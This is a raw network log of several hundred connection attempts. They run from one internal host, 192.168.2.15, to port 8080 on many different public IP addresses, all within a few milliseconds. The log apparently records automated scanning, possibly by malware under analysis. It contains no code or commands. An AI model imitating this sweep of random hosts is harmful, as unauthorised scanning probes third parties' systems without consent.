Feb 14, 2024 09:28:47.392955065 CET	6752	8080	192.168.2.15	62.87.133.177
Feb 14, 2024 09:28:47.392957926 CET	6752	8080	192.168.2.15	31.187.125.52
Feb 14, 2024 09:28:47.392957926 CET	6752	8080	192.168.2.15	62.216.142.41
Feb 14, 2024 09:28:47.392961979 CET	6752	8080	192.168.2.15	31.237.38.47
Feb 14, 2024 09:28:47.392977953 CET	6752	8080	192.168.2.15	62.127.72.161
Feb 14, 2024 09:28:47.392978907 CET	6752	8080	192.168.2.15	62.143.78.147
Feb 14, 2024 09:28:47.392983913 CET	6752	8080	192.168.2.15	94.194.132.67
Feb 14, 2024 09:28:47.392997026 CET	6752	8080	192.168.2.15	94.239.171.202
Feb 14, 2024 09:28:47.392997980 CET	6752	8080	192.168.2.15	94.181.215.157
Feb 14, 2024 09:28:47.392998934 CET	6752	8080	192.168.2.15	85.42.141.251
Feb 14, 2024 09:28:47.393017054 CET	6752	8080	192.168.2.15	95.228.221.5
Feb 14, 2024 09:28:47.393018007 CET	6752	8080	192.168.2.15	85.68.7.88
Feb 14, 2024 09:28:47.393018007 CET	6752	8080	192.168.2.15	62.142.54.131
Feb 14, 2024 09:28:47.393021107 CET	6752	8080	192.168.2.15	95.115.77.163
Feb 14, 2024 09:28:47.393038034 CET	6752	8080	192.168.2.15	31.48.53.225
Feb 14, 2024 09:28:47.393038988 CET	6752	8080	192.168.2.15	31.63.65.115
Feb 14, 2024 09:28:47.393042088 CET	6752	8080	192.168.2.15	62.18.46.39
Feb 14, 2024 09:28:47.393042088 CET	6752	8080	192.168.2.15	95.228.239.98
Feb 14, 2024 09:28:47.393049002 CET	6752	8080	192.168.2.15	31.244.140.174
Feb 14, 2024 09:28:47.393064976 CET	6752	8080	192.168.2.15	95.141.192.134
Feb 14, 2024 09:28:47.393064976 CET	6752	8080	192.168.2.15	31.235.50.31
Feb 14, 2024 09:28:47.393068075 CET	6752	8080	192.168.2.15	94.179.235.184
Feb 14, 2024 09:28:47.393070936 CET	6752	8080	192.168.2.15	85.227.56.68
Feb 14, 2024 09:28:47.393088102 CET	6752	8080	192.168.2.15	95.70.215.130
Feb 14, 2024 09:28:47.393088102 CET	6752	8080	192.168.2.15	31.170.205.118
Feb 14, 2024 09:28:47.393090963 CET	6752	8080	192.168.2.15	94.116.170.22
Feb 14, 2024 09:28:47.393093109 CET	6752	8080	192.168.2.15	94.89.57.235
Feb 14, 2024 09:28:47.393104076 CET	6752	8080	192.168.2.15	94.225.11.10
Feb 14, 2024 09:28:47.393105984 CET	6752	8080	192.168.2.15	62.96.167.31
Feb 14, 2024 09:28:47.393112898 CET	6752	8080	192.168.2.15	85.185.222.1
Feb 14, 2024 09:28:47.393115997 CET	6752	8080	192.168.2.15	94.181.67.179
Feb 14, 2024 09:28:47.393131018 CET	6752	8080	192.168.2.15	95.137.228.170
Feb 14, 2024 09:28:47.393137932 CET	6752	8080	192.168.2.15	95.215.225.94
Feb 14, 2024 09:28:47.393151045 CET	6752	8080	192.168.2.15	62.48.45.21
Feb 14, 2024 09:28:47.393152952 CET	6752	8080	192.168.2.15	85.94.231.191
Feb 14, 2024 09:28:47.393155098 CET	6752	8080	192.168.2.15	95.95.129.151
Feb 14, 2024 09:28:47.393160105 CET	6752	8080	192.168.2.15	62.44.38.88
Feb 14, 2024 09:28:47.393167019 CET	6752	8080	192.168.2.15	62.208.161.133
Feb 14, 2024 09:28:47.393168926 CET	6752	8080	192.168.2.15	85.152.8.148
Feb 14, 2024 09:28:47.393168926 CET	6752	8080	192.168.2.15	94.168.99.122
Feb 14, 2024 09:28:47.393168926 CET	6752	8080	192.168.2.15	95.42.22.48
Feb 14, 2024 09:28:47.393171072 CET	6752	8080	192.168.2.15	85.174.192.237
Feb 14, 2024 09:28:47.393171072 CET	6752	8080	192.168.2.15	62.13.103.116
Feb 14, 2024 09:28:47.393176079 CET	6752	8080	192.168.2.15	31.151.25.232
Feb 14, 2024 09:28:47.393176079 CET	6752	8080	192.168.2.15	94.30.16.122
Feb 14, 2024 09:28:47.393186092 CET	6752	8080	192.168.2.15	31.10.47.95
Feb 14, 2024 09:28:47.393188953 CET	6752	8080	192.168.2.15	94.122.18.192
Feb 14, 2024 09:28:47.393188953 CET	6752	8080	192.168.2.15	62.141.181.122
Feb 14, 2024 09:28:47.393196106 CET	6752	8080	192.168.2.15	62.181.201.186
Feb 14, 2024 09:28:47.393198013 CET	6752	8080	192.168.2.15	85.24.129.97
Feb 14, 2024 09:28:47.393203020 CET	6752	8080	192.168.2.15	31.234.239.179
Feb 14, 2024 09:28:47.393220901 CET	6752	8080	192.168.2.15	94.102.27.49
Feb 14, 2024 09:28:47.393224001 CET	6752	8080	192.168.2.15	94.16.125.155
Feb 14, 2024 09:28:47.393225908 CET	6752	8080	192.168.2.15	62.152.132.10
Feb 14, 2024 09:28:47.393229008 CET	6752	8080	192.168.2.15	95.75.58.195
Feb 14, 2024 09:28:47.393229008 CET	6752	8080	192.168.2.15	31.127.13.134
Feb 14, 2024 09:28:47.393234015 CET	6752	8080	192.168.2.15	85.119.244.201
Feb 14, 2024 09:28:47.393234015 CET	6752	8080	192.168.2.15	85.38.224.128
Feb 14, 2024 09:28:47.393254995 CET	6752	8080	192.168.2.15	62.206.115.67
Feb 14, 2024 09:28:47.393258095 CET	6752	8080	192.168.2.15	94.97.147.211
Feb 14, 2024 09:28:47.393259048 CET	6752	8080	192.168.2.15	62.178.63.200
Feb 14, 2024 09:28:47.393258095 CET	6752	8080	192.168.2.15	85.161.243.245
Feb 14, 2024 09:28:47.393258095 CET	6752	8080	192.168.2.15	85.41.48.14
Feb 14, 2024 09:28:47.393274069 CET	6752	8080	192.168.2.15	95.228.190.17
Feb 14, 2024 09:28:47.393280983 CET	6752	8080	192.168.2.15	94.68.25.46
Feb 14, 2024 09:28:47.393285036 CET	6752	8080	192.168.2.15	94.189.239.200
Feb 14, 2024 09:28:47.393285036 CET	6752	8080	192.168.2.15	94.32.186.16
Feb 14, 2024 09:28:47.393287897 CET	6752	8080	192.168.2.15	94.204.108.251
Feb 14, 2024 09:28:47.393289089 CET	6752	8080	192.168.2.15	85.16.255.11
Feb 14, 2024 09:28:47.393290997 CET	6752	8080	192.168.2.15	85.101.21.26
Feb 14, 2024 09:28:47.393290997 CET	6752	8080	192.168.2.15	62.54.23.48
Feb 14, 2024 09:28:47.393290997 CET	6752	8080	192.168.2.15	95.158.128.149
Feb 14, 2024 09:28:47.393296003 CET	6752	8080	192.168.2.15	62.38.0.36
Feb 14, 2024 09:28:47.393301964 CET	6752	8080	192.168.2.15	85.11.13.25
Feb 14, 2024 09:28:47.393307924 CET	6752	8080	192.168.2.15	85.178.150.245
Feb 14, 2024 09:28:47.393310070 CET	6752	8080	192.168.2.15	62.54.137.59
Feb 14, 2024 09:28:47.393323898 CET	6752	8080	192.168.2.15	31.158.251.96
Feb 14, 2024 09:28:47.393330097 CET	6752	8080	192.168.2.15	85.251.84.223
Feb 14, 2024 09:28:47.393333912 CET	6752	8080	192.168.2.15	94.207.197.121
Feb 14, 2024 09:28:47.393337965 CET	6752	8080	192.168.2.15	94.30.71.2
Feb 14, 2024 09:28:47.393342972 CET	6752	8080	192.168.2.15	85.202.63.124
Feb 14, 2024 09:28:47.393357992 CET	6752	8080	192.168.2.15	31.49.70.158
Feb 14, 2024 09:28:47.393362999 CET	6752	8080	192.168.2.15	62.175.235.124
Feb 14, 2024 09:28:47.393362999 CET	6752	8080	192.168.2.15	62.226.31.248
Feb 14, 2024 09:28:47.393362999 CET	6752	8080	192.168.2.15	95.4.62.191
Feb 14, 2024 09:28:47.393368959 CET	6752	8080	192.168.2.15	62.199.145.2
Feb 14, 2024 09:28:47.393379927 CET	6752	8080	192.168.2.15	95.212.168.168
Feb 14, 2024 09:28:47.393382072 CET	6752	8080	192.168.2.15	85.109.15.197
Feb 14, 2024 09:28:47.393388987 CET	6752	8080	192.168.2.15	31.154.86.23
Feb 14, 2024 09:28:47.393404007 CET	6752	8080	192.168.2.15	94.203.100.251
Feb 14, 2024 09:28:47.393407106 CET	6752	8080	192.168.2.15	85.123.207.79
Feb 14, 2024 09:28:47.393409014 CET	6752	8080	192.168.2.15	85.164.115.159
Feb 14, 2024 09:28:47.393409014 CET	6752	8080	192.168.2.15	62.148.241.207
Feb 14, 2024 09:28:47.393421888 CET	6752	8080	192.168.2.15	31.134.53.237
Feb 14, 2024 09:28:47.393429041 CET	6752	8080	192.168.2.15	31.65.234.26
Feb 14, 2024 09:28:47.393435001 CET	6752	8080	192.168.2.15	62.220.228.186
Feb 14, 2024 09:28:47.393441916 CET	6752	8080	192.168.2.15	31.212.202.143
Feb 14, 2024 09:28:47.393452883 CET	6752	8080	192.168.2.15	62.153.52.253
Feb 14, 2024 09:28:47.393455029 CET	6752	8080	192.168.2.15	31.78.1.209
Feb 14, 2024 09:28:47.393460989 CET	6752	8080	192.168.2.15	62.223.218.31
Feb 14, 2024 09:28:47.393466949 CET	6752	8080	192.168.2.15	95.62.83.75
Feb 14, 2024 09:28:47.393466949 CET	6752	8080	192.168.2.15	62.24.174.26
Feb 14, 2024 09:28:47.393481970 CET	6752	8080	192.168.2.15	95.40.35.126
Feb 14, 2024 09:28:47.393486977 CET	6752	8080	192.168.2.15	94.34.31.253
Feb 14, 2024 09:28:47.393490076 CET	6752	8080	192.168.2.15	31.125.182.58
Feb 14, 2024 09:28:47.393500090 CET	6752	8080	192.168.2.15	95.33.59.13
Feb 14, 2024 09:28:47.393506050 CET	6752	8080	192.168.2.15	62.235.42.202
Feb 14, 2024 09:28:47.393516064 CET	6752	8080	192.168.2.15	62.189.248.158
Feb 14, 2024 09:28:47.393522024 CET	6752	8080	192.168.2.15	85.104.17.182
Feb 14, 2024 09:28:47.393527031 CET	6752	8080	192.168.2.15	62.171.99.180
Feb 14, 2024 09:28:47.393527985 CET	6752	8080	192.168.2.15	62.146.201.64
Feb 14, 2024 09:28:47.393543005 CET	6752	8080	192.168.2.15	94.59.64.25
Feb 14, 2024 09:28:47.393543959 CET	6752	8080	192.168.2.15	95.25.70.97
Feb 14, 2024 09:28:47.393547058 CET	6752	8080	192.168.2.15	85.236.98.32
Feb 14, 2024 09:28:47.393563032 CET	6752	8080	192.168.2.15	62.161.220.141
Feb 14, 2024 09:28:47.393568039 CET	6752	8080	192.168.2.15	62.94.50.149
Feb 14, 2024 09:28:47.393568039 CET	6752	8080	192.168.2.15	62.62.76.84
Feb 14, 2024 09:28:47.393579960 CET	6752	8080	192.168.2.15	31.21.60.47
Feb 14, 2024 09:28:47.393584013 CET	6752	8080	192.168.2.15	94.37.67.165
Feb 14, 2024 09:28:47.393589020 CET	6752	8080	192.168.2.15	62.153.93.14
Feb 14, 2024 09:28:47.393591881 CET	6752	8080	192.168.2.15	94.147.173.17
Feb 14, 2024 09:28:47.393594980 CET	6752	8080	192.168.2.15	95.19.249.2
Feb 14, 2024 09:28:47.393604994 CET	6752	8080	192.168.2.15	94.36.206.57
Feb 14, 2024 09:28:47.393610001 CET	6752	8080	192.168.2.15	31.146.102.83
Feb 14, 2024 09:28:47.393614054 CET	6752	8080	192.168.2.15	94.111.8.229
Feb 14, 2024 09:28:47.393618107 CET	6752	8080	192.168.2.15	85.78.77.105
Feb 14, 2024 09:28:47.393626928 CET	6752	8080	192.168.2.15	95.156.113.186
Feb 14, 2024 09:28:47.393634081 CET	6752	8080	192.168.2.15	95.163.140.175
Feb 14, 2024 09:28:47.393635988 CET	6752	8080	192.168.2.15	31.214.209.39
Feb 14, 2024 09:28:47.393645048 CET	6752	8080	192.168.2.15	62.42.35.35
Feb 14, 2024 09:28:47.393645048 CET	6752	8080	192.168.2.15	95.106.13.193
Feb 14, 2024 09:28:47.393651962 CET	6752	8080	192.168.2.15	62.220.218.4
Feb 14, 2024 09:28:47.393661022 CET	6752	8080	192.168.2.15	62.154.76.55
Feb 14, 2024 09:28:47.393661022 CET	6752	8080	192.168.2.15	62.145.47.54
Feb 14, 2024 09:28:47.393665075 CET	6752	8080	192.168.2.15	62.26.210.76
Feb 14, 2024 09:28:47.393672943 CET	6752	8080	192.168.2.15	95.249.186.175
Feb 14, 2024 09:28:47.393676043 CET	6752	8080	192.168.2.15	85.93.79.136
Feb 14, 2024 09:28:47.393676043 CET	6752	8080	192.168.2.15	94.178.14.138
Feb 14, 2024 09:28:47.393676043 CET	6752	8080	192.168.2.15	85.40.246.180
Feb 14, 2024 09:28:47.393688917 CET	6752	8080	192.168.2.15	62.204.253.156
Feb 14, 2024 09:28:47.393693924 CET	6752	8080	192.168.2.15	95.169.33.212
Feb 14, 2024 09:28:47.393697977 CET	6752	8080	192.168.2.15	31.218.240.14
Feb 14, 2024 09:28:47.393708944 CET	6752	8080	192.168.2.15	62.11.186.137
Feb 14, 2024 09:28:47.393708944 CET	6752	8080	192.168.2.15	85.60.47.157
Feb 14, 2024 09:28:47.393708944 CET	6752	8080	192.168.2.15	31.71.85.214
Feb 14, 2024 09:28:47.393712997 CET	6752	8080	192.168.2.15	95.177.177.41
Feb 14, 2024 09:28:47.393735886 CET	6752	8080	192.168.2.15	94.178.203.135
Feb 14, 2024 09:28:47.393735886 CET	6752	8080	192.168.2.15	94.163.186.202
Feb 14, 2024 09:28:47.393737078 CET	6752	8080	192.168.2.15	94.87.79.55
Feb 14, 2024 09:28:47.393748045 CET	6752	8080	192.168.2.15	31.19.150.189
Feb 14, 2024 09:28:47.393758059 CET	6752	8080	192.168.2.15	95.196.129.24
Feb 14, 2024 09:28:47.393759012 CET	6752	8080	192.168.2.15	31.237.125.236
Feb 14, 2024 09:28:47.393768072 CET	6752	8080	192.168.2.15	94.41.19.6
Feb 14, 2024 09:28:47.393773079 CET	6752	8080	192.168.2.15	31.76.87.17
Feb 14, 2024 09:28:47.393775940 CET	6752	8080	192.168.2.15	95.142.159.57
Feb 14, 2024 09:28:47.393788099 CET	6752	8080	192.168.2.15	85.15.163.24
Feb 14, 2024 09:28:47.393790007 CET	6752	8080	192.168.2.15	94.157.108.188
Feb 14, 2024 09:28:47.393790960 CET	6752	8080	192.168.2.15	95.136.58.125
Feb 14, 2024 09:28:47.393806934 CET	6752	8080	192.168.2.15	94.207.87.199
Feb 14, 2024 09:28:47.393806934 CET	6752	8080	192.168.2.15	31.205.45.78
Feb 14, 2024 09:28:47.393816948 CET	6752	8080	192.168.2.15	62.224.63.34
Feb 14, 2024 09:28:47.393826008 CET	6752	8080	192.168.2.15	95.253.40.248
Feb 14, 2024 09:28:47.393830061 CET	6752	8080	192.168.2.15	95.84.72.53
Feb 14, 2024 09:28:47.393832922 CET	6752	8080	192.168.2.15	31.117.124.62
Feb 14, 2024 09:28:47.393838882 CET	6752	8080	192.168.2.15	85.165.68.35
Feb 14, 2024 09:28:47.393857002 CET	6752	8080	192.168.2.15	31.73.201.191
Feb 14, 2024 09:28:47.393863916 CET	6752	8080	192.168.2.15	31.247.18.123
Feb 14, 2024 09:28:47.393857002 CET	6752	8080	192.168.2.15	62.215.231.100
Feb 14, 2024 09:28:47.393865108 CET	6752	8080	192.168.2.15	31.180.37.80
Feb 14, 2024 09:28:47.393866062 CET	6752	8080	192.168.2.15	62.2.211.118
Feb 14, 2024 09:28:47.393876076 CET	6752	8080	192.168.2.15	31.244.33.98
Feb 14, 2024 09:28:47.393882036 CET	6752	8080	192.168.2.15	31.126.56.7
Feb 14, 2024 09:28:47.393898010 CET	6752	8080	192.168.2.15	95.113.212.4
Feb 14, 2024 09:28:47.393898010 CET	6752	8080	192.168.2.15	62.16.189.153
Feb 14, 2024 09:28:47.393898964 CET	6752	8080	192.168.2.15	62.106.151.187
Feb 14, 2024 09:28:47.393898964 CET	6752	8080	192.168.2.15	95.99.215.204
Feb 14, 2024 09:28:47.393899918 CET	6752	8080	192.168.2.15	94.147.179.147
Feb 14, 2024 09:28:47.393902063 CET	6752	8080	192.168.2.15	95.3.205.147
Feb 14, 2024 09:28:47.393902063 CET	6752	8080	192.168.2.15	31.145.213.195
Feb 14, 2024 09:28:47.393908024 CET	6752	8080	192.168.2.15	94.169.196.51
Feb 14, 2024 09:28:47.393919945 CET	6752	8080	192.168.2.15	85.157.75.46
Feb 14, 2024 09:28:47.393923044 CET	6752	8080	192.168.2.15	95.116.215.218
Feb 14, 2024 09:28:47.393928051 CET	6752	8080	192.168.2.15	85.90.255.129
Feb 14, 2024 09:28:47.393938065 CET	6752	8080	192.168.2.15	95.197.83.65
Feb 14, 2024 09:28:47.393944979 CET	6752	8080	192.168.2.15	85.126.175.132
Feb 14, 2024 09:28:47.393951893 CET	6752	8080	192.168.2.15	31.35.194.96
Feb 14, 2024 09:28:47.393956900 CET	6752	8080	192.168.2.15	62.83.27.143
Feb 14, 2024 09:28:47.393960953 CET	6752	8080	192.168.2.15	95.86.204.109
Feb 14, 2024 09:28:47.393976927 CET	6752	8080	192.168.2.15	95.53.249.143
Feb 14, 2024 09:28:47.393980980 CET	6752	8080	192.168.2.15	31.223.169.179
Feb 14, 2024 09:28:47.393980980 CET	6752	8080	192.168.2.15	94.142.40.74
Feb 14, 2024 09:28:47.393991947 CET	6752	8080	192.168.2.15	85.22.95.253
Feb 14, 2024 09:28:47.394000053 CET	6752	8080	192.168.2.15	95.133.171.104
Feb 14, 2024 09:28:47.394002914 CET	6752	8080	192.168.2.15	95.29.20.5
Feb 14, 2024 09:28:47.394012928 CET	6752	8080	192.168.2.15	62.31.82.22
Feb 14, 2024 09:28:47.394021988 CET	6752	8080	192.168.2.15	85.72.130.230
Feb 14, 2024 09:28:47.394033909 CET	6752	8080	192.168.2.15	62.26.74.206
Feb 14, 2024 09:28:47.394035101 CET	6752	8080	192.168.2.15	31.136.114.243
Feb 14, 2024 09:28:47.394045115 CET	6752	8080	192.168.2.15	94.7.221.168
Feb 14, 2024 09:28:47.394047976 CET	6752	8080	192.168.2.15	85.225.92.24
Feb 14, 2024 09:28:47.394059896 CET	6752	8080	192.168.2.15	85.183.187.61
Feb 14, 2024 09:28:47.394073009 CET	6752	8080	192.168.2.15	85.14.67.172
Feb 14, 2024 09:28:47.394073009 CET	6752	8080	192.168.2.15	31.46.100.247
Feb 14, 2024 09:28:47.394076109 CET	6752	8080	192.168.2.15	94.5.17.116
Feb 14, 2024 09:28:47.394088984 CET	6752	8080	192.168.2.15	94.194.253.148
Feb 14, 2024 09:28:47.394092083 CET	6752	8080	192.168.2.15	94.191.223.0
Feb 14, 2024 09:28:47.394107103 CET	6752	8080	192.168.2.15	95.27.238.127
Feb 14, 2024 09:28:47.394108057 CET	6752	8080	192.168.2.15	94.191.90.236
Feb 14, 2024 09:28:47.394117117 CET	6752	8080	192.168.2.15	31.31.94.212
Feb 14, 2024 09:28:47.394119024 CET	6752	8080	192.168.2.15	62.62.160.224
Feb 14, 2024 09:28:47.394121885 CET	6752	8080	192.168.2.15	85.61.89.55
Feb 14, 2024 09:28:47.394124031 CET	6752	8080	192.168.2.15	62.91.208.24
Feb 14, 2024 09:28:47.394128084 CET	6752	8080	192.168.2.15	94.35.88.73
Feb 14, 2024 09:28:47.394133091 CET	6752	8080	192.168.2.15	85.251.224.145
Feb 14, 2024 09:28:47.394139051 CET	6752	8080	192.168.2.15	85.147.216.31
Feb 14, 2024 09:28:47.394148111 CET	6752	8080	192.168.2.15	95.130.87.23
Feb 14, 2024 09:28:47.394165039 CET	6752	8080	192.168.2.15	85.74.153.138
Feb 14, 2024 09:28:47.394165993 CET	6752	8080	192.168.2.15	31.171.175.171
Feb 14, 2024 09:28:47.394171000 CET	6752	8080	192.168.2.15	95.246.20.65
Feb 14, 2024 09:28:47.394180059 CET	6752	8080	192.168.2.15	62.137.123.61
Feb 14, 2024 09:28:47.394188881 CET	6752	8080	192.168.2.15	31.107.229.23
Feb 14, 2024 09:28:47.394196987 CET	6752	8080	192.168.2.15	95.32.22.233
Feb 14, 2024 09:28:47.394201994 CET	6752	8080	192.168.2.15	31.109.70.49
Feb 14, 2024 09:28:47.394218922 CET	6752	8080	192.168.2.15	95.30.113.74
Feb 14, 2024 09:28:47.394220114 CET	6752	8080	192.168.2.15	94.88.188.72
Feb 14, 2024 09:28:47.394223928 CET	6752	8080	192.168.2.15	62.63.55.121
Feb 14, 2024 09:28:47.394234896 CET	6752	8080	192.168.2.15	31.28.104.43
Feb 14, 2024 09:28:47.394237041 CET	6752	8080	192.168.2.15	62.244.120.162
Feb 14, 2024 09:28:47.394248009 CET	6752	8080	192.168.2.15	31.97.204.48
Feb 14, 2024 09:28:47.394249916 CET	6752	8080	192.168.2.15	31.121.219.220
Feb 14, 2024 09:28:47.394249916 CET	6752	8080	192.168.2.15	85.253.113.62
Feb 14, 2024 09:28:47.394254923 CET	6752	8080	192.168.2.15	85.171.213.9
Feb 14, 2024 09:28:47.394256115 CET	6752	8080	192.168.2.15	62.216.93.181
Feb 14, 2024 09:28:47.394257069 CET	6752	8080	192.168.2.15	62.178.65.166
Feb 14, 2024 09:28:47.394270897 CET	6752	8080	192.168.2.15	85.78.80.78
Feb 14, 2024 09:28:47.394275904 CET	6752	8080	192.168.2.15	62.185.216.154
Feb 14, 2024 09:28:47.394279957 CET	6752	8080	192.168.2.15	85.129.17.73
Feb 14, 2024 09:28:47.394282103 CET	6752	8080	192.168.2.15	85.172.72.221
Feb 14, 2024 09:28:47.394284964 CET	6752	8080	192.168.2.15	85.210.132.1
Feb 14, 2024 09:28:47.394300938 CET	6752	8080	192.168.2.15	94.205.114.15
Feb 14, 2024 09:28:47.394300938 CET	6752	8080	192.168.2.15	85.33.34.51
Feb 14, 2024 09:28:47.394309044 CET	6752	8080	192.168.2.15	94.211.17.4
Feb 14, 2024 09:28:47.394323111 CET	6752	8080	192.168.2.15	62.171.28.128
Feb 14, 2024 09:28:47.394323111 CET	6752	8080	192.168.2.15	94.83.189.18
Feb 14, 2024 09:28:47.394339085 CET	6752	8080	192.168.2.15	31.3.234.224
Feb 14, 2024 09:28:47.394349098 CET	6752	8080	192.168.2.15	31.160.32.26
Feb 14, 2024 09:28:47.394351006 CET	6752	8080	192.168.2.15	95.96.220.82
Feb 14, 2024 09:28:47.394351959 CET	6752	8080	192.168.2.15	95.112.251.240
Feb 14, 2024 09:28:47.394356966 CET	6752	8080	192.168.2.15	31.50.205.144
Feb 14, 2024 09:28:47.394371033 CET	6752	8080	192.168.2.15	31.243.242.82
Feb 14, 2024 09:28:47.394372940 CET	6752	8080	192.168.2.15	95.15.219.244
Feb 14, 2024 09:28:47.394373894 CET	6752	8080	192.168.2.15	62.209.100.93
Feb 14, 2024 09:28:47.394386053 CET	6752	8080	192.168.2.15	62.56.115.69
Feb 14, 2024 09:28:47.394387007 CET	6752	8080	192.168.2.15	62.70.164.130
Feb 14, 2024 09:28:47.394397020 CET	6752	8080	192.168.2.15	85.78.253.22
Feb 14, 2024 09:28:47.394397974 CET	6752	8080	192.168.2.15	62.139.81.176
Feb 14, 2024 09:28:47.394409895 CET	6752	8080	192.168.2.15	31.156.87.70
Feb 14, 2024 09:28:47.394412994 CET	6752	8080	192.168.2.15	62.119.232.53
Feb 14, 2024 09:28:47.394432068 CET	6752	8080	192.168.2.15	62.112.239.48
Feb 14, 2024 09:28:47.394433975 CET	6752	8080	192.168.2.15	94.113.200.181
Feb 14, 2024 09:28:47.394434929 CET	6752	8080	192.168.2.15	85.125.219.154
Feb 14, 2024 09:28:47.394445896 CET	6752	8080	192.168.2.15	31.34.198.245
Feb 14, 2024 09:28:47.394455910 CET	6752	8080	192.168.2.15	95.175.252.16
Feb 14, 2024 09:28:47.394458055 CET	6752	8080	192.168.2.15	94.51.247.211
Feb 14, 2024 09:28:47.394462109 CET	6752	8080	192.168.2.15	62.102.91.176
Feb 14, 2024 09:28:47.394474030 CET	6752	8080	192.168.2.15	31.65.35.144
Feb 14, 2024 09:28:47.394475937 CET	6752	8080	192.168.2.15	31.143.21.253
Feb 14, 2024 09:28:47.394484997 CET	6752	8080	192.168.2.15	95.174.29.206
Feb 14, 2024 09:28:47.394490004 CET	6752	8080	192.168.2.15	85.40.174.191
Feb 14, 2024 09:28:47.394490004 CET	6752	8080	192.168.2.15	62.25.27.225
Feb 14, 2024 09:28:47.394495010 CET	6752	8080	192.168.2.15	85.58.218.120
Feb 14, 2024 09:28:47.394505978 CET	6752	8080	192.168.2.15	85.56.219.88
Feb 14, 2024 09:28:47.394507885 CET	6752	8080	192.168.2.15	62.54.191.223
Feb 14, 2024 09:28:47.394524097 CET	6752	8080	192.168.2.15	31.27.245.196
Feb 14, 2024 09:28:47.394531012 CET	6752	8080	192.168.2.15	62.170.86.246
Feb 14, 2024 09:28:47.394531012 CET	6752	8080	192.168.2.15	85.35.57.176
Feb 14, 2024 09:28:47.394531965 CET	6752	8080	192.168.2.15	31.85.207.139
Feb 14, 2024 09:28:47.394541979 CET	6752	8080	192.168.2.15	85.242.57.251
Feb 14, 2024 09:28:47.394548893 CET	6752	8080	192.168.2.15	85.194.244.168
Feb 14, 2024 09:28:47.394562960 CET	6752	8080	192.168.2.15	62.68.253.38
Feb 14, 2024 09:28:47.394571066 CET	6752	8080	192.168.2.15	95.32.238.130
Feb 14, 2024 09:28:47.394573927 CET	6752	8080	192.168.2.15	31.235.160.108
Feb 14, 2024 09:28:47.394577026 CET	6752	8080	192.168.2.15	31.239.15.216
Feb 14, 2024 09:28:47.394577026 CET	6752	8080	192.168.2.15	94.53.90.137
Feb 14, 2024 09:28:47.394582987 CET	6752	8080	192.168.2.15	31.91.22.100
Feb 14, 2024 09:28:47.394591093 CET	6752	8080	192.168.2.15	62.202.93.119
Feb 14, 2024 09:28:47.394603968 CET	6752	8080	192.168.2.15	31.46.42.66
Feb 14, 2024 09:28:47.394607067 CET	6752	8080	192.168.2.15	85.117.166.96
Feb 14, 2024 09:28:47.394610882 CET	6752	8080	192.168.2.15	31.234.7.228
Feb 14, 2024 09:28:47.394628048 CET	6752	8080	192.168.2.15	62.89.121.253
Feb 14, 2024 09:28:47.394629002 CET	6752	8080	192.168.2.15	62.85.248.54
Feb 14, 2024 09:28:47.394643068 CET	6752	8080	192.168.2.15	95.232.162.97
Feb 14, 2024 09:28:47.394643068 CET	6752	8080	192.168.2.15	94.134.89.252
Feb 14, 2024 09:28:47.394659042 CET	6752	8080	192.168.2.15	62.39.22.57
Feb 14, 2024 09:28:47.394659042 CET	6752	8080	192.168.2.15	62.136.39.106
Feb 14, 2024 09:28:47.394668102 CET	6752	8080	192.168.2.15	62.85.241.197
Feb 14, 2024 09:28:47.394669056 CET	6752	8080	192.168.2.15	94.48.109.106
Feb 14, 2024 09:28:47.394686937 CET	6752	8080	192.168.2.15	94.95.153.22
Feb 14, 2024 09:28:47.394689083 CET	6752	8080	192.168.2.15	85.209.49.219
Feb 14, 2024 09:28:47.394691944 CET	6752	8080	192.168.2.15	31.8.225.130
Feb 14, 2024 09:28:47.394691944 CET	6752	8080	192.168.2.15	94.28.6.201
Feb 14, 2024 09:28:47.394691944 CET	6752	8080	192.168.2.15	95.35.225.171
Feb 14, 2024 09:28:47.394699097 CET	6752	8080	192.168.2.15	94.151.172.146
Feb 14, 2024 09:28:47.394707918 CET	6752	8080	192.168.2.15	85.253.158.182
Feb 14, 2024 09:28:47.394711018 CET	6752	8080	192.168.2.15	62.85.88.253
Feb 14, 2024 09:28:47.394721985 CET	6752	8080	192.168.2.15	62.67.16.47
Feb 14, 2024 09:28:47.394730091 CET	6752	8080	192.168.2.15	94.45.7.207
Feb 14, 2024 09:28:47.394742012 CET	6752	8080	192.168.2.15	94.105.60.52
Feb 14, 2024 09:28:47.394743919 CET	6752	8080	192.168.2.15	62.146.107.85
Feb 14, 2024 09:28:47.394746065 CET	6752	8080	192.168.2.15	31.53.138.193
Feb 14, 2024 09:28:47.394753933 CET	6752	8080	192.168.2.15	62.241.221.218
Feb 14, 2024 09:28:47.394758940 CET	6752	8080	192.168.2.15	94.213.204.27
Feb 14, 2024 09:28:47.394767046 CET	6752	8080	192.168.2.15	31.73.59.174
Feb 14, 2024 09:28:47.394781113 CET	6752	8080	192.168.2.15	62.26.75.123
Feb 14, 2024 09:28:47.394781113 CET	6752	8080	192.168.2.15	85.126.159.92
Feb 14, 2024 09:28:47.394782066 CET	6752	8080	192.168.2.15	85.4.59.186
Feb 14, 2024 09:28:47.394794941 CET	6752	8080	192.168.2.15	31.224.130.99
Feb 14, 2024 09:28:47.394794941 CET	6752	8080	192.168.2.15	94.192.38.98
Feb 14, 2024 09:28:47.394804001 CET	6752	8080	192.168.2.15	62.78.177.136
Feb 14, 2024 09:28:47.394813061 CET	6752	8080	192.168.2.15	95.204.10.147
Feb 14, 2024 09:28:47.394819021 CET	6752	8080	192.168.2.15	94.143.233.189
Feb 14, 2024 09:28:47.394820929 CET	6752	8080	192.168.2.15	94.226.16.66
Feb 14, 2024 09:28:47.394820929 CET	6752	8080	192.168.2.15	85.33.109.99
Feb 14, 2024 09:28:47.394831896 CET	6752	8080	192.168.2.15	85.155.174.42
Feb 14, 2024 09:28:47.394838095 CET	6752	8080	192.168.2.15	94.114.152.147
Feb 14, 2024 09:28:47.394855976 CET	6752	8080	192.168.2.15	31.88.75.225
Feb 14, 2024 09:28:47.394857883 CET	6752	8080	192.168.2.15	62.194.21.208
Feb 14, 2024 09:28:47.394860983 CET	6752	8080	192.168.2.15	31.96.234.70
Feb 14, 2024 09:28:47.394860983 CET	6752	8080	192.168.2.15	31.172.69.83
Feb 14, 2024 09:28:47.394869089 CET	6752	8080	192.168.2.15	31.171.178.180
Feb 14, 2024 09:28:47.394869089 CET	6752	8080	192.168.2.15	62.7.17.3
Feb 14, 2024 09:28:47.394872904 CET	6752	8080	192.168.2.15	31.241.3.113
Feb 14, 2024 09:28:47.394874096 CET	6752	8080	192.168.2.15	94.44.137.33
